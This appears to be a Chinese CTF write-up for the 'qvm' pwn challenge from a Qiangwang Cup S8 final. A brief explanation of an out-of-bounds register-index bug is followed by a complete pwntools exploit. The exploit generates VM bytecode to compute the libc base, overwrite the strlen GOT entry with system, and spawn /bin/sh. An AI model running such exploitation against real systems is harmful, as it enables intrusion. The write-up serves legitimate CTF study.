强网杯S8决赛qvm
本来想分析一下的,但这个题的主要难度在于逆向;漏洞点在于对寄存器 idx 的检查有问题,导致可以越界,最后打通了
逆向的过程也是赛博算卦,硬猜硬试打通的
from pwnlib.util.packing import u64
from pwnlib.util.packing import u32
from pwnlib.util.packing import u16
from pwnlib.util.packing import u8
from pwnlib.util.packing import p64
from pwnlib.util.packing import p32
from pwnlib.util.packing import p16
from pwnlib.util.packing import p8
from pwn import *
from ctypes import *
context(os='linux', arch='amd64', log_level='debug')
# Local launch of the challenge binary; the commented lines below are the
# author's alternative launch modes (gdb, remote, seccomp-tools dump) kept
# for switching between local debugging and the remote instance.
p = process("/home/zp9080/PWN/pwn")
# p=gdb.debug("/home/zp9080/PWN/pwn",'b *$rebase(0x1A8F7)')
# p=remote('192.168.18.26',8883)
# p=process(['seccomp-tools','dump','/home/zp9080/PWN/pwn'])
elf = ELF("/home/zp9080/PWN/pwn")
# libc resolved by pwntools from the binary's dynamic dependencies.
libc=elf.libc
def dbg():
    """Attach gdb to the live process with a rebased breakpoint, then block.

    Uses the module-level process `p`; `gdb.attach` and `pause` come from
    the pwntools star-import at the top of the file.
    """
    breakpoint_cmd = 'b *$rebase(0xFBE1)'
    gdb.attach(p, breakpoint_cmd)
    pause()
#mov传参要是10进制
#谁在右边传值给谁
#strlen 1139208
def off2s(value, reg):
    """Render `value` as a double-and-add instruction sequence for register `reg`.

    `value` is formatted as a zero-padded binary string of at least 32 bits,
    most significant bit first.  Each bit except the last yields
    `mul 2 <reg>` for a 0 and `inc <reg>` followed by `mul 2 <reg>` for a 1;
    the final bit yields a single `inc <reg>` when it is 1.  Leading zero bits
    still emit `mul 2 <reg>`, so (presumably, if `mul 2` doubles the register
    -- the VM semantics are not visible here) the sequence only reproduces
    `value` when `reg` starts at 0.  Any character other than '0'/'1' (e.g.
    the sign of a negative value) emits nothing.

    Returns the instruction text, one instruction per line, each newline-
    terminated.
    """
    bits = format(value, '032b')
    *head, last = bits
    emitted = []
    for bit in head:
        if bit == '1':
            emitted.append(f'inc {reg}')
        if bit in ('0', '1'):
            emitted.append(f'mul 2 {reg}')
    if last == '1':
        emitted.append(f'inc {reg}')
    return ''.join(f'{line}\n' for line in emitted)
code='''
data 1 "/bin/sh\x00"
_start:
mov 1139208 0
inc 2
inc 2
'''
# Build the constant in register 1 via off2s (which emits leading `mul 2`
# lines, so it relies on register 1 starting at 0).
code+=off2s(0xA86A0+0x109a00,1)
# Derive libc base (author's note: "得到libcbase").  Per the "谁在右边传值给谁"
# note above, `sub 1 0` presumably updates register 0 -- not verifiable here.
tmp='sub 1 0\n'
code+=tmp
# Author's note says "ogg" (one-gadget), but the constant actually used is
# named `system`; the two comments disagree and only the value matters.
system=0x50900
code+=off2s(system,3)
tmp='add 3 0\n'
code+=tmp
# Write the strlen GOT entry (author's notes: "写strlen_got", "strlen 1139208").
tmp='mov 0 1139208\n'
code+=tmp
tmp='ods 1\n'
code+=tmp
# 'EOF' terminates the program text expected by the VM's code reader.
code+='EOF'
# dbg()
p.sendlineafter(b'Code :',code)
p.interactive()